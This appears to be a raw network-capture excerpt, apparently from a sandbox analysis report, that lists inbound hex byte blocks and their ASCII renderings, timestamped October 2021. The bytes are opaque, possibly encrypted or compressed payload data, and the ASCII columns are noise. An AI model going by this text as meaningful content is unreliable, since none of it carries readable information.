?`/;cChy#{1{3mA-L#rwBk@n+azYIU%z^nOL'HRH@Z"KwI=M7l"WTZy"Ab305v,xy0Nnm~t-^^Pbp&l
2021-10-13 11:06:38 UTC	172	IN	Data Raw: c9 07 17 a5 ad 15 60 cf 19 83 db 92 3c 74 2f 86 87 dd 1c 6d 8e 8f 4c 17 87 6a b6 6b 7a fc 87 69 3a f0 4c 60 50 8a ce af 1c e7 a3 51 1f bd 13 58 11 7c 4f 9a be 25 97 02 e8 e9 f6 57 81 47 ac 4e 4c 85 da 8a 27 08 97 0c fb 02 6e 64 78 60 13 7d c9 86 46 79 0e 7e ce e7 31 d0 98 66 5d 8b d2 60 eb 88 c9 53 55 e3 33 79 0e 0f 24 4b bf 4c 8b ee f5 40 40 6d 6a b7 97 5e 89 f7 33 da 7c 83 bb bc a9 78 fb c0 b4 75 b8 88 ab 55 57 8d 42 7f 71 80 b8 6b 23 72 00 04 5b 06 47 78 0f 85 be 05 1d 25 ba d4 8e d2 8d 42 2a 90 0d d9 f1 44 d9 bc 5e 1a ba 5c cd 49 6c e4 11 cd 86 28 39 1f 50 4b c4 1d 5b 8f 0a 39 d6 80 7a 77 69 9c 33 6b d0 b7 cb a2 38 4a e0 d9 43 e0 b9 9b 29 91 ae 9d 7b 8e 06 c3 06 0e 35 c9 ea 09 fe d8 48 03 cd b1 34 1a b3 4f 9e e8 05 00 8b b8 ba 23 d5 dd bb 68 e0 15 ba Data Ascii: `<t/mLjkzi:L`PQX\|O%WGNL'ndx`}Fy~1f]`SU3y$KL@@mj^3\|xuUWBqk#r[Gx%B*D^\Il(9PK[9zwi3k8JC){5H4O#h
2021-10-13 11:06:38 UTC	173	IN	Data Raw: 1d 9a 0c 7e 6f 30 bc 0b 17 26 e7 e9 0d 99 45 4a 04 17 26 01 8a 1f 70 64 b4 d5 16 76 28 95 89 1d 62 2b b3 2c 29 ad ce 4a 45 9a f4 b9 e0 a1 97 98 a3 8f 23 73 26 aa 93 48 8a 55 63 1a 36 d5 e5 4c c1 6c b9 bd 2a c8 ed 5b fb 9b e0 24 db 39 f0 61 bc 14 16 12 5b 98 ff 12 c9 c9 63 54 b5 a8 2c 43 5f 37 dc 78 97 2e df 68 31 bf 34 27 5a df fc 75 36 2c 30 2f 4d d2 23 c0 f0 74 58 3d 89 4c df d5 f1 fa eb 0c 84 86 8b 4d 33 0a f1 ac 61 b3 bf 2e 43 78 fd bd 7c 60 92 7a aa 02 a4 96 c8 e3 83 38 83 f6 f6 51 b9 f7 84 ea 3d ad 59 5d 98 5a 8f e3 e9 a4 c8 ee 68 21 41 c5 fa f7 5f a9 c9 e6 7d 06 c9 95 54 3c 41 49 cc 78 bd f3 b3 82 19 20 c7 92 79 9b e6 dc 4d ce 93 b7 ad fb 4b 43 af 60 5d 14 dd 05 25 93 f2 d8 af 4c 09 92 a8 39 ce fc b1 4c 0f fc c9 f5 04 29 36 22 da b1 f6 e8 64 b2 ca Data Ascii: ~o0&EJ&pdv(b+,)JE#s&HUc6Ll*[$9a[cT,C_7x.h14'Zu6,0/M#tX=LM3a.Cx\|`z8Q=Y]Zh!A_}T<AIx yMKC`]%L9L)6"d
2021-10-13 11:06:38 UTC	175	IN	Data Raw: 64 b7 59 83 d0 57 f7 34 f9 c6 02 9f 03 80 1b 4c 36 b0 88 20 2f 27 25 46 c9 d3 0d 4e cb 20 b7 c0 db c2 c3 f4 e1 48 58 78 be 82 30 2d ed e0 1c f5 24 c1 97 a5 57 b3 ca 82 96 93 73 03 9b 2a df 2c eb 42 79 62 c5 f0 c0 62 b7 23 d9 2d ee 80 91 5a 0e 4f 2b 61 b3 f8 82 dd 9a c6 68 ef 11 ca 16 e2 53 8f ab ae 16 81 62 52 74 33 ea cd 79 39 c9 4d d0 bb 8b c8 a7 ed f8 63 95 53 36 17 61 10 0c a3 9b b8 2d a9 39 cd 7a b9 29 e2 7e ad b6 bc 84 dc 82 77 33 69 1a b2 7c 11 5d 79 d4 31 7d cf 8e 3b 77 33 49 a4 f4 b9 e9 99 12 ae 8a d4 68 62 96 37 c5 1b 3b 8c 40 0f f7 d0 4a b9 44 bf cc db d6 11 9d 89 8e 96 06 7f f6 35 d2 3d a1 23 a8 fe 72 03 f9 b5 d9 4f 89 ad 5d 92 9e 7f 48 05 a3 93 53 22 b6 f7 05 5d 0e 94 6b e9 b7 ca 54 25 1d bb 68 76 d3 8b 4a 0a e8 2b ac b3 57 91 84 5f 11 40 5d Data Ascii: dYW4L6 /'%FN HXx0-$Ws*,Bybb#-ZO+ahSbRt3y9McS6a-9z)~w3i\|]y1};w3Ihb7;@JD5=#rO]HS"]kT%hvJ+W_@]
2021-10-13 11:06:38 UTC	176	IN	Data Raw: e8 36 f6 a9 07 85 39 2c 15 11 e1 f2 78 e4 8b a4 80 0e ec de b0 c4 2d 8c d7 3e be c1 1a 60 4f ee 0f fe 27 02 27 fb 63 66 a7 5c c6 8b b8 21 d1 34 b2 4d 46 8e 5d 0a 68 11 10 3c b1 18 01 c0 a1 0f db 36 5c c2 b6 a7 d6 f9 78 a9 2f c6 1d 79 7c fe 85 6e 5e bf 09 11 3e d4 5a 2e 84 37 ac 42 ed 27 88 89 1d 76 7c 87 66 3f 54 4e 73 13 e7 63 8f b0 2e 28 b5 fd f9 15 d1 86 5f 92 54 96 58 a0 8d 22 73 b1 3d 80 76 ec b3 3d ed 37 0e e6 4e c0 6c ae 2c 39 5a 9f bd 89 6d e1 d3 d8 3b e1 61 2b 83 60 59 3d 7e 39 e4 c8 da 67 56 a3 a8 bb d4 c9 c8 ae 9e 21 71 df 46 35 bd 32 3f 69 6c ef da 5f ca 9e de 4c 98 27 c2 96 77 cf aa 09 6b aa 33 f7 0a ea 6a 80 84 8d 55 00 b9 e2 d7 0a 55 82 de 42 fa f9 bf 1a 63 e3 fc b9 32 d1 70 84 13 82 a5 87 f4 b2 52 2e 60 7a d1 57 4b 07 ad 99 e3 8b e1 f8 bc Data Ascii: 69,x->`O''cf\!4MF]h<6\x/y\|n^>Z.7B'v\|f?TNsc.(_TX"s=v=7Nl,9Zm;a+`Y=~9gV!qF52?il_L'wk3jUUBc2pR.`zWK
2021-10-13 11:06:38 UTC	177	IN	Data Raw: 29 d7 3c 4a 98 bd e0 45 bd ca ed 49 2c d4 93 9d 38 76 43 2b 71 a1 5d 06 46 e5 ec c5 ca db dd f6 1d 4e 9e 89 cd 91 86 34 e7 10 01 b6 fb ec 35 da c0 f7 d2 10 48 a4 8e 76 ef 8f 09 ee b7 5f b8 38 ab 2a 6e f1 e1 40 68 af b9 b1 6e c6 b5 56 14 58 bf de 55 e1 34 6e 51 12 f3 79 66 fd ef 37 ed 86 22 39 27 b2 d1 7f 82 72 a8 79 82 b6 be d5 c0 d5 f4 76 df 06 5a cb 64 3e b0 ec 40 12 f7 32 c1 80 34 a3 34 b5 64 c4 0e 72 c1 95 28 c9 2c fc d3 27 7f b2 16 5a ff b6 c7 d7 2f ff 80 06 cd a5 dc 54 87 cd 64 83 db 95 c4 79 ef 86 5d dd bb 3a 69 8d 31 17 a9 6d 50 62 33 fd 5c 69 d1 b6 ab 62 2d 8a 82 a8 ef ee 63 51 c4 bd 9a 08 f6 7e 32 9a d3 22 ab 2f cd ed 2e 57 c4 00 4b 4c 31 85 50 8d 75 25 69 0d 23 02 3b 36 9f 62 6e 7d 62 81 39 71 2b 7a 17 e7 f8 97 7f 64 20 8b 1a 67 60 80 37 52 8c Data Ascii: )<JEI,8vC+q]FN45Hv_8*n@hnVXU4nQyf7"9'ryvZd>@244dr(,'Z/Tdy]:i1mPb3\ib-cQ~2"/.WKL1Pu%i#;6bn}b9q+zd g`7R
2021-10-13 11:06:38 UTC	178	IN	Data Raw: 27 8f 85 ec be f1 cb ee b7 30 8c 2b 9c 5c d4 c9 6e 7f 04 5e 94 7f 8e 30 e1 ee 10 be 8e b3 28 1b 22 50 93 48 29 97 40 9c a6 90 ca ad 37 49 41 38 61 1e a6 af 19 aa fa f1 a5 af a2 0b 90 3f 38 90 4e c5 82 36 8a ca 88 04 39 35 20 4d b0 87 5a 10 e0 5d 9f b1 ed 22 20 84 b3 73 e4 00 05 99 7a 31 17 9d 85 e5 e2 e9 af a6 06 78 8f 14 f8 d1 32 e5 f7 9e 57 94 cc b3 f5 f9 79 8e 89 92 ec 1c 9c e1 bf 81 7d ba 64 e0 1e 4d 0c b9 39 6f 10 74 6b e3 99 5a 74 8e c2 75 01 9d 4f c8 0c e4 5f 31 7e 29 d7 aa dc 42 c9 12 a1 c2 b7 7e ba 3b d6 93 9d ae e0 1d e4 95 45 22 7b f3 c8 f8 c7 ca db 4b 60 a0 c0 6c 6d b2 ec 50 7b f3 12 01 b6 6d 7a 84 23 24 13 ad 6d b0 cd 9a 74 ef 8f 9f 78 86 b4 4b dc d4 57 74 79 f5 42 68 af 2f 27 8d e5 50 b2 6b 25 83 78 41 e3 34 6e c7 84 94 91 96 19 90 4a b0 42 Data Ascii: '0+\n^0("PH)@7IA8a?8N695 MZ]" sz1x2Wy}dM9otkZtuO_1~)B~;E"{K`lmP{mz#$mtxKWtyBh/'Pk%xA4nJB
2021-10-13 11:06:38 UTC	179	IN	Data Raw: f9 a0 35 52 1a e3 31 3d e6 3f c2 49 c4 44 03 fa d9 41 10 6d 34 f3 33 5b 6f f5 48 d2 e3 97 21 bf f9 78 b9 84 a6 44 5e 8a d0 5d 92 b9 65 7b 20 80 26 2e ed 77 e6 06 20 0e b6 4c f3 84 ef 05 9f 60 86 e5 68 d0 f6 4a 4e af 2a dd a3 44 07 f9 55 1c 5c 5e b6 41 33 db ed cc d4 28 fb 5a 43 79 22 1f 20 87 19 17 fa 81 29 77 77 d9 06 6d 36 b5 b0 aa 32 64 7a da 10 e0 bb de bd a3 48 9f 00 86 62 c3 b5 0a 61 c9 b4 4c a1 de ae 01 b6 b9 62 1a 0d 4b ca e8 47 45 7f 8c 5c 21 ae d5 96 56 ab 14 ef 43 9e 83 20 a6 03 31 8b bc fd 5c 3b 9b 29 eb 59 a5 24 f5 52 fd 52 77 1c 49 83 75 f0 92 92 bd b6 56 8e ff 4f b1 b6 88 77 a4 e8 25 ce be 0c 66 38 31 a9 41 7d 4f e9 90 f7 0e 47 6e 5e 5d 8e 07 c2 9d 81 63 d5 b2 c7 70 c5 38 db 2e b8 e1 97 36 2f 8b 93 85 8f 2e 65 13 62 f3 7d e4 f4 a4 7a 2c 78 Data Ascii: 5R1=?IDAm43[oH!xD^]e{ &.w L`hJN*DU\^A3(ZCy" )wwm62dzHbaLbKGE\!VC 1\;)Y$RRwIuVOw%f81A}OGn^]cp8.6/.eb}z,x
2021-10-13 11:06:38 UTC	180	IN	Data Raw: cb 14 ad 78 b5 0c 48 6c d7 bd 4f 3f 94 d6 ed 75 47 2c 0a a3 62 f3 c5 c2 eb 77 d1 11 0b 6d ae d5 63 77 2b 08 62 84 f0 55 40 02 e0 ac 10 b3 16 a3 23 59 1b bf 67 63 81 47 bb 02 d5 96 10 6e 69 3c 65 f4 cf 52 aa db 78 eb 4c ad 93 d0 52 7b 69 e1 85 bc 57 e6 ec 21 30 c5 bc 7a 42 ac 2f e4 16 06 96 b9 7d 18 30 49 7e f6 70 d6 55 80 72 20 ba be 4a bf 97 dc 0b 40 d4 b2 4b f9 20 43 34 4f 1c 30 af 05 3b 1c e0 f5 49 4e 62 92 12 16 92 d8 c5 4c a1 6c b8 f0 e2 2b 5d 22 03 9e 85 cc 10 b2 cc 79 5f a0 c4 10 ec b1 1c ca 02 93 99 81 a6 f1 37 fd 03 b4 81 ad 36 28 7a 19 14 2b 40 d4 f1 bb 78 23 fc ce 01 db fb ef 8e fe 06 0a cc e4 07 25 e9 7f 6e 4a e2 88 4d 0d 25 df 2d 5c 92 d3 8b 9b ac 5a 8c 54 75 a5 09 a9 c7 77 02 81 59 7c 3e f8 a8 4a 42 89 90 47 d5 f8 98 46 53 d4 aa b2 ac 76 1d Data Ascii: xHlO?uG,bwmcw+bU@#YgcGni<eRxLR{iW!0zB/}0I~pUr J@K C4O0;INbLl+]"y_76(z+@x#%nJM%-\ZTuwY\|>JBGFSv
2021-10-13 11:06:38 UTC	182	IN	Data Raw: 2e 8f 19 4c 5d 96 84 50 1f 33 d5 f3 6b 32 b4 4d f6 50 14 cb 41 ef 93 63 18 6b bf 07 1c 10 ea 4f 22 af cb ab 52 cd 86 81 55 c9 03 ad d8 4c 6d df 64 75 58 69 80 8c 00 3a 20 79 f6 13 53 d6 68 39 0c 2b d4 b8 e5 b9 94 99 f0 5d 99 d0 8e 60 fd 37 82 23 e1 a7 3d 0f 99 24 89 a3 a2 bd a7 db b3 29 6f a2 f3 96 c8 89 cb 31 34 3f ca 23 ab c3 7a 2f 84 b5 e3 b8 0c b6 bb 90 e5 67 4d 1a 82 b0 2e 22 e4 00 74 59 e8 96 10 f1 d3 d5 07 09 60 bb 42 8e c6 ab ac 08 f3 28 a5 99 46 91 f9 5f 8c ba c6 cf a7 54 87 ef 55 ee 2a 6d 5a 51 dd c4 29 7c 61 9c 4b f8 3b 13 75 e1 d9 32 fd d0 73 c9 4c 99 38 78 06 2a e2 2d de 28 07 ae f9 5c 60 ab 9f b7 f7 5b cb 22 4c ff 4e 48 ed cf 5f 8c 46 0f 55 f1 ea d1 45 8a 2e ba a2 f7 33 99 09 a9 2b d4 41 08 83 6c 31 e5 2c f3 5a d0 03 39 fb 12 e9 cf a5 8f 65 Data Ascii: .L]P3k2MPAckO"RULmduXi: ySh9+]`7#=$)o14?#z/gM."tY`B(F_TUmZQ)\|aK;u2sL8x-(\`["LNH_FUE.3+Al1,Z9e
2021-10-13 11:06:38 UTC	183	IN	Data Raw: 97 8a 87 74 9a 85 8d 3f 0f 1c 97 11 9a 63 bd b3 33 23 53 ff 12 15 c2 c0 bb 90 29 96 0e a3 4a 20 95 b3 d6 80 d5 be 57 3f 90 37 43 e5 33 d4 8a ac c7 39 76 d9 59 8b 10 e1 b2 db d6 e3 87 29 68 60 d1 6f 9a 3b 99 c8 5f 63 fb b7 4e b9 3f c9 16 eb 7a 23 0c df fe 31 a6 31 d9 6b 87 ef 51 01 2e 9c a3 4c 44 23 d0 80 91 cd 41 09 28 e8 d7 f5 77 ea 9a 84 cb 8e b3 02 52 e2 ca 56 b1 80 a3 42 ee fd ad 0d 85 e1 17 b9 85 93 94 86 6e 82 ae 83 81 b1 b4 2c 8b 7a 43 0a af 05 d0 99 cc 8f ae ef 5a f3 b6 ee eb 76 c7 2a 7a 5e 3f c9 47 68 e0 5c e9 7f f4 76 4b e8 f6 bc 65 b3 39 18 c6 52 ee 48 b1 d0 de 9d 40 92 21 ad 10 5e a5 3a 1c 1e 00 e8 07 ad 1c f3 4e af 7d 06 74 3d 45 90 8a 82 4e 37 6c c8 63 04 3c 24 c4 4f cd 87 b8 57 b0 5a 79 b3 06 22 d7 8b 57 71 99 00 06 de 83 30 f1 9f 6e e5 89 Data Ascii: t?c3#S)J W?7C39vY)h`o;_cN?z#11kQ.LD#A(wRVBn,zCZv*z^?Gh\vKe9RH@!^:N}t=EN7lc<$OWZy"Wq0n
2021-10-13 11:06:38 UTC	184	IN	Data Raw: 6d 0b c1 b0 3a 7f 5f 21 4c 7b ff b6 56 db 90 d3 12 74 34 06 d9 92 80 3c cd ec 76 1c 1c 06 27 82 df a3 74 e6 80 c6 73 72 95 9b 57 c8 ca fe 38 27 87 e9 f2 58 82 b6 b5 d9 e1 f9 66 04 26 a5 6a 04 63 cf 19 83 4b 9a 06 78 09 84 b6 dd f9 7c 8d 8f 4c 17 17 62 12 65 d5 ff b7 69 61 e6 4f 60 50 8a 5e a7 1f ef 85 53 2f bd 73 4e 12 7c 4f 9a 2e 2d df 28 2b ef c5 57 5f 51 af 4e 4c 85 4a 82 13 27 8f 0f c8 02 8d 72 7b 60 13 7d 59 8e 1a 78 cd 78 fc e7 60 c6 9b 66 5d 8b 42 68 f9 82 d1 50 67 e3 5d 6f 0d 0f 24 4b 2f 44 f5 d1 3d 43 6d 6d b9 a0 94 5e 89 f7 a3 d2 f5 b5 c5 bd 84 78 13 d7 b7 75 b8 88 3b 5d 10 8c 81 79 5d 80 ed 7d 20 72 00 04 cb 0e 66 6f 17 86 92 05 76 33 b9 d4 8e d2 1d 4a b8 9a ce df de 44 31 aa 5d 1a ba 5c 5d 41 4a f9 09 ce a9 28 ac 09 53 4b c4 1d cb 87 8d 20 1e Data Ascii: m:_!L{Vt4<v'tsrW8'Xf&jcKx\|LbeiaO`P^S/sN\|O.-(+W_QNLJ'r{`}Yxx`f]BhPg]o$K/D=Cmm^xu;]y]} rfov3JD1]\]AJ(SK
2021-10-13 11:06:38 UTC	185	IN	Data Raw: 38 c2 ad cb 33 f7 3c 40 c3 18 f6 4f 34 b2 18 c5 7d c1 26 43 64 bd 5f c4 1d b8 45 42 d2 2a 24 a0 8d 7e 08 5e 12 12 aa b1 f8 a7 26 a9 71 3d 17 7f c0 e4 a4 d4 6f 78 27 bc 20 e1 11 9a b8 a6 6c 30 bc 0b 87 3e de fd c8 b8 49 4a 26 ce 25 01 8a 1f e0 7c 41 f5 d9 57 24 95 99 c4 61 2b b3 2c be b5 c9 5e f3 bb f8 b9 3a 77 94 98 a3 8f b4 73 b0 ad 66 4a 86 55 f3 ce 35 d5 e5 4c 56 6c a6 88 df ca e1 5b 66 4e e3 24 db 39 77 61 00 13 86 33 57 98 35 c6 ca c9 63 54 35 a8 eb 70 2f 16 d0 78 13 53 dd 68 31 bf a4 3f 3c fc 09 77 3a 2c ce fc 4e d2 23 c0 00 77 23 08 ef 6f d3 d5 81 28 e8 0c 84 86 1b 55 80 2e 04 ae 6d b3 16 fc 40 78 fd bd 8c 63 2c 6c 5f 00 a8 96 3e 31 80 38 83 f6 24 52 ed f7 9c e9 31 ad df 8f 9b 5a 8f e3 6e bc b2 cc 08 23 4d c5 d1 25 5c a9 c9 e6 fd 06 ab 95 99 1a 4d Data Ascii: 83<@O4}&Cd_EB*$~^&q=ox' l0>IJ&%\|AW$a+,^:wsfJU5LVl[fN$9wa3W5cT5p/xSh1?<w:,N#w#o(U.m@xc,l_>18$R1Zn#M%\M
2021-10-13 11:06:38 UTC	187	IN	Data Raw: 83 97 7e 0b e6 f1 e9 ef 81 c7 3d 49 f7 a1 16 75 6d b2 38 50 e4 ce fa 03 77 6d df a1 c8 26 fc ae 23 95 58 8e b7 ef 25 97 19 84 99 5e 4b de d4 75 3e e3 e5 70 51 2d 70 8d f4 7c 47 69 49 82 ac 42 e2 37 77 c6 ba bf 74 83 e6 93 df 83 87 23 10 26 1a 6c 75 d4 41 4f 2a e9 6d c2 12 c2 a9 d3 60 4a cf 73 b9 8e 20 ce d5 e1 a9 f9 7b c0 49 a2 31 a1 a4 82 87 72 cf 27 b9 29 88 2d 57 61 a1 69 91 f1 91 92 9e 20 f0 2c 63 b3 2b 58 8c 64 ff 46 fb 1a d2 dc 38 e5 45 ec 5f cb 6c fa 6e 8c 56 4c 76 92 25 51 bb 33 96 da 7a 32 d5 4c 44 4b 80 cb c6 ec e2 40 1c 51 d4 06 83 0f fa 4f eb b9 1e 8c 3c cd 8c b9 dd dc 5a ae cf 4d 8e cc dc 74 a4 68 f0 9e 66 39 a9 78 b9 37 34 ce 1f 3a c1 20 10 82 5e b8 1e 89 e2 5e 4a d5 e8 4a 0b 34 cb 1b 93 8f ac 0c 96 25 c5 aa ba be 43 da b9 3f f5 a1 6a 97 ad Data Ascii: ~=Ium8Pwm&#X%^Ku>pQ-p\|GiIB7wt#&luAO*m`Js {I1r')-Wai ,c+XdF8E_lnVLv%Q3z2LDK@QO<ZMthf9x74: ^^JJ4%C?j
2021-10-13 11:06:38 UTC	188	IN	Data Raw: 1b f6 e8 7f 9c 68 0f 45 b9 93 cd bd 2c 5f 5a f4 e3 b3 97 be 4d ad 21 25 e1 b5 2d 68 e7 30 e7 64 70 6e 0a 93 25 23 93 67 b6 5f 6d 31 91 9c df 42 89 92 97 79 ba 3b f1 24 17 e2 43 36 8a 8d d8 84 26 2e 6e 06 e7 fb b2 e6 34 ad 00 07 8b dd 04 cf ee 8a 5b 3d e3 dc 3d 64 4e ea 13 eb 8e 01 30 fa 62 71 98 5b 35 88 0b 3e 62 30 81 59 28 af 69 0b bf 11 c0 11 2c 11 26 c0 2f 0c f9 3d 90 c2 6e b1 62 fd 91 ab 0b cc 4b 69 73 fe 6b 7b fb b5 ba 11 a9 d4 1f 27 ee 34 65 48 12 20 08 8e 83 45 a6 8e 19 3d c6 4c 72 18 33 63 9a 9b f5 2d e4 ff 5c 30 05 81 10 90 2e ba b3 a9 03 22 89 83 92 8a c4 fb d2 25 af 3d 7c e5 c6 d5 25 af 2b 38 5f 9c 1d 81 19 e5 b8 e8 72 eb 78 2f 26 45 8d 2e a9 3f be de 55 69 75 a7 9b 9e fe cd 85 ac 54 30 af d5 41 35 8c 17 2c 69 c3 eb 46 62 3f 9c ea 48 7b 11 7c Data Ascii: hE,_ZM!%-h0dpn%#g_m1By;$C6&.n4[==dN0bq[5>b0Y(i,&/=nbKisk{'4eH E=Lr3c-\0."%=\|%+8_rx/&E.?UiuT0A5,iFb?H{\|
2021-10-13 11:06:38 UTC	189	IN	Data Raw: 13 b8 87 00 4b 3c 07 2b f7 d2 c3 82 5e 21 b0 c8 6f d3 bf f9 a7 f8 c9 1e 52 f7 d0 21 8f 5a 29 63 d1 8e ca 17 e0 c9 54 6b f4 e1 bf 9a 53 70 b8 40 f1 b3 46 a9 92 62 14 95 c5 7e 6b c2 71 48 eb 89 c1 6e e2 dd ef 40 e2 d3 b4 8a 07 76 75 3e 1f b4 89 06 80 da 2d d2 9b da 13 e5 68 5f 39 8d 39 98 9f 2e ac 16 8f 92 9a fb 15 da ac e0 74 12 21 a8 1b 76 ae 97 0e ea 58 5d bb 2f 7f 2a 1c eb 4c 58 c1 af f1 9c 62 df 42 55 eb 74 46 d5 c6 e0 a5 4f 22 07 f5 78 b3 da 81 37 51 89 13 1c 35 a8 56 7e b1 68 c1 7d ee b7 a2 f1 4d d3 b5 74 db 22 41 c7 8b 39 d7 f8 f3 1c f4 37 1a a2 13 b9 c9 b1 6c e8 ab 71 72 9d fb e0 9b e6 ec 27 5a 9d 32 42 bb b5 41 d0 21 e4 31 06 7a a4 7b 4d 9d cf 2a a6 ce 9a c2 78 dc a3 b3 da 34 2e a0 87 ce 10 7d 62 84 4c 1d fc 9b 68 d4 ba 71 63 ac 8a 4f bd b3 e8 67 Data Ascii: K<+^!oR!Z)cTkSp@Fb~kqHn@vu>-h_99.t!vX]/LXbBUtFO"x7Q5V~h}Mt"A97lqr'Z2BA!1z{Mx4.}bLhqcOg
2021-10-13 11:06:38 UTC	191	IN	Data Raw: 78 29 a5 ef 3f 30 aa d3 5c e1 57 ba 8c 7f e9 35 f3 2d 17 2f a3 a2 bb 7d af a8 91 87 e2 62 00 25 19 ea 16 4c 7a ce 3e 94 80 28 5a cb 4d fd 80 8f 69 bd a9 c3 0b bc c5 a9 9e fa a7 2f 5a 6b 2d f5 df d1 5d d5 4d 1c 5b 29 0a c8 6a a9 fd b0 d6 2d 75 6a 6e a9 9c f7 15 1e b6 01 a6 6f ce 21 28 c2 83 77 23 f2 05 5c af 11 10 ce 20 d4 28 eb f6 c7 10 fb 57 d0 e4 9a 92 6c 41 be ae 13 52 d7 fe c6 43 76 2b 8e 00 5f f7 e2 88 de 10 96 71 96 8d f0 aa 9b d1 88 23 a1 e0 81 21 72 5c c7 94 ca e5 98 e4 47 8f 19 b6 61 c0 98 f7 c3 81 ee 30 36 32 bc 6c e1 4b b3 6d 46 1b 20 db a7 85 24 88 4e cf 3a 60 b0 37 9f 42 ac 50 3c e2 0f ec e5 f8 d5 7e 62 f7 bf 9a e2 5f bf ef f8 57 33 58 20 8a 17 ed cf af ac 1a 4b 79 93 92 12 29 36 2a 7d 9c d5 f8 52 3d 94 bc b4 f3 2b d7 2d 6c 85 d8 6b 14 bd 34 Data Ascii: x)?0\W5-/}b%Lz>(ZMi/Zk-]M[)j-ujno!(w#\ (WlARCv+_q#!r\Ga062lKmF $N:`7BP<~b_W3X Ky)6*}R=+-lk4
2021-10-13 11:06:38 UTC	192	IN	Data Raw: c1 ed b0 be fb b3 0e 0a 1a 4f 9b 48 2f 92 e4 b1 48 92 23 a8 c6 71 6a 38 12 1e f5 af 2b ad 87 e4 41 83 62 1f 31 28 9a bc f6 c5 e7 20 ad e4 b5 04 02 20 67 4d f0 87 df 10 af 5a 3a b3 83 22 0f 91 f2 73 ff 00 bf 99 c8 30 82 9f 23 e5 d5 fc b6 a6 2a 78 7a 14 38 d6 c9 e7 e3 9e 52 81 3a b3 75 f9 c4 8e bb 90 89 1e fa e1 0b 94 fc ba 1f e0 cd 4d 8e b3 5c 6d 28 74 58 f6 e8 5a 72 8f f4 75 8e 9f ec ca d0 e4 48 24 39 29 76 aa 99 42 cc 06 e4 c0 d9 7e 59 2e 77 93 5e ae 08 1c ea 97 88 20 43 f3 2b ee 26 ca d8 49 35 a0 5b 78 96 b0 71 50 12 e5 55 01 55 6d 6f 84 9e 26 f5 ae 3b b0 ec 8c 76 ee 9c 9f f3 86 78 5f 29 d6 37 74 df e2 6b 68 ea 2f f1 8c ec 53 11 69 18 82 c3 57 fc 34 0e c6 01 94 63 80 9f 93 1c b0 cd 20 b9 26 99 47 3a d7 d0 4f 50 ff f3 c0 1b c3 fe f4 33 49 c6 72 d0 82 21 Data Ascii: OH/H#qj8+Ab1( gMZ:"s0#*xz8R:uM\m(tXZruH$9)vB~Y.w^ C+&I5[xqPUUmo&;vx_)7tkh/SiW4c &G:OP3Ir!
2021-10-13 11:06:38 UTC	193	IN	Data Raw: 5e e2 3d cc 3d b7 1d a1 f1 66 2f 84 12 7a 74 95 ad 5d 2c b9 52 65 20 80 8b 32 e0 7c 00 04 22 00 ae 73 f1 84 1b 09 cb 6e bb d4 d8 cd 49 44 0a 8e c4 ef 73 59 91 f9 89 12 80 42 cb 41 32 f2 d5 d2 d4 28 64 4e 60 54 c4 1d 72 8e 96 28 f8 81 8c 5f f6 fa 32 6b be 98 01 b7 9b 45 25 fe 0d c3 2d de 30 8d 6c 93 7d 86 6a c9 59 22 61 c9 f2 43 4b f1 48 03 00 94 42 26 0f 4b ce c3 6b 6c 8a b8 ae 24 e6 cb 9b 74 fc 19 2d 4d 08 83 b7 ae 27 3d f6 bc 1a 7d fb 95 29 eb 71 86 4d fd b6 ff 2b 77 4e 6b 83 75 f5 92 01 bd 2b 57 6e fd 35 b1 c7 aa 72 a4 e1 25 5a be 1c 61 d5 33 d6 41 fc 6d e6 90 f6 0e c4 6e 82 5c 6a 05 a9 9d 39 41 d6 b2 d0 70 5c 38 8c 29 23 e3 fb 36 f4 a9 ef 85 9c 2e f2 13 e3 f2 88 e6 8b a4 9e 0f 6f de c1 d0 d4 8f bf 3e 42 c3 38 61 58 ee 98 fe e6 01 d6 f9 1c 66 9f 5e dd Data Ascii: ^==f/zt],Re 2\|"snIDsYBA2(dN`Tr(_2kE%-0l}jY"aCKHB&Kkl$t-M'=})qM+wNku+Wn5r%Za3Amn\j9Ap\8)#6.o>B8aXf^
2021-10-13 11:06:38 UTC	194	IN	Data Raw: ff 53 cc 3c 4f 6c a1 d4 5e 6c e9 0c c2 87 9c 54 2c 24 e1 ac 16 b0 ab a2 97 49 f4 bd 1c 60 ce 6b 5f 33 dc 96 80 6d ad 39 42 c7 bb 52 68 f7 f5 ea 28 b8 04 d0 dd 5b a6 e0 0d 8d f9 cb ae 20 1b c6 96 48 56 a9 8d e7 46 05 ef a5 77 18 38 28 ea f6 2b f2 b7 02 0f 20 50 93 48 bf 97 dc 9d 40 92 b7 ad fb 5d 43 b0 67 1e 30 ab 05 ad 1c f3 d8 af 4c 1f 92 3f 38 91 d8 83 4b 37 6c c8 f5 0e 29 20 22 4d b0 87 cc 10 b2 5a 79 b9 90 b5 15 91 b1 73 e4 04 93 99 81 30 f1 9f f8 e5 b6 fc ad ac 06 df 0c 14 2b d6 d4 e3 8a 9e 21 81 ce b3 f5 f9 ef 8e fe 91 0a a0 fb e1 27 94 7f be 64 e0 88 4d 0d b3 df 6d 6d 74 d1 f7 9b 85 5c 8e 54 75 a5 9b a9 ca 71 e4 83 24 7c 29 d7 aa 4a 48 89 5e 69 c0 ca 7e 44 2a d4 93 9d ae 76 1d 2a 97 a3 20 06 f9 e8 a0 f1 ca db 4b f6 a4 48 78 8b b0 91 50 39 e5 10 01 Data Ascii: S<Ol^lT,$I`k_3m9BRh([ HVFw8(+ PH@]Cg0L?8K7l) "MZys0+!'dMmmt\Tuq$\|)JH^i~Dv KHxP9
2021-10-13 11:06:38 UTC	196	IN	Data Raw: 13 17 bd 40 79 64 34 06 d4 eb 79 e8 61 8e a8 b8 13 8c 03 e8 0b 4c c3 99 82 30 60 69 45 f0 02 5b 65 79 02 56 7d ac cb 3b 15 6e 7a e4 a2 b9 f2 dc 66 3a ce d4 00 27 80 75 14 1a a0 e1 3d 4b 49 24 0e ff 44 f9 9c db 06 56 6d ea b5 96 3f cf f7 57 94 3d d4 65 bf 9d 3e 2f e1 f3 75 de ce ad 3a d4 98 25 3c 20 c3 f7 2e 66 35 00 41 1a 0e d2 2a f1 c3 a8 05 41 27 bb b5 c9 d2 e9 0d 0a ed 6f dd c7 03 91 9c 18 1a dc 1b cb 26 11 fa ad 84 d4 6b 25 5a 15 03 c4 58 15 87 d8 7e f8 c6 61 77 a9 91 32 0a 98 b7 af e2 9b 26 30 da 74 a8 2d bb 60 91 c8 d5 7d e1 e1 e2 f5 43 61 8a 6b 4c bb 91 48 46 82 b9 c8 72 0f 0c 83 e8 99 0c 8a df df 57 8c 94 c8 37 e0 5d ef 22 41 83 0e ee e5 50 bf bc b6 37 39 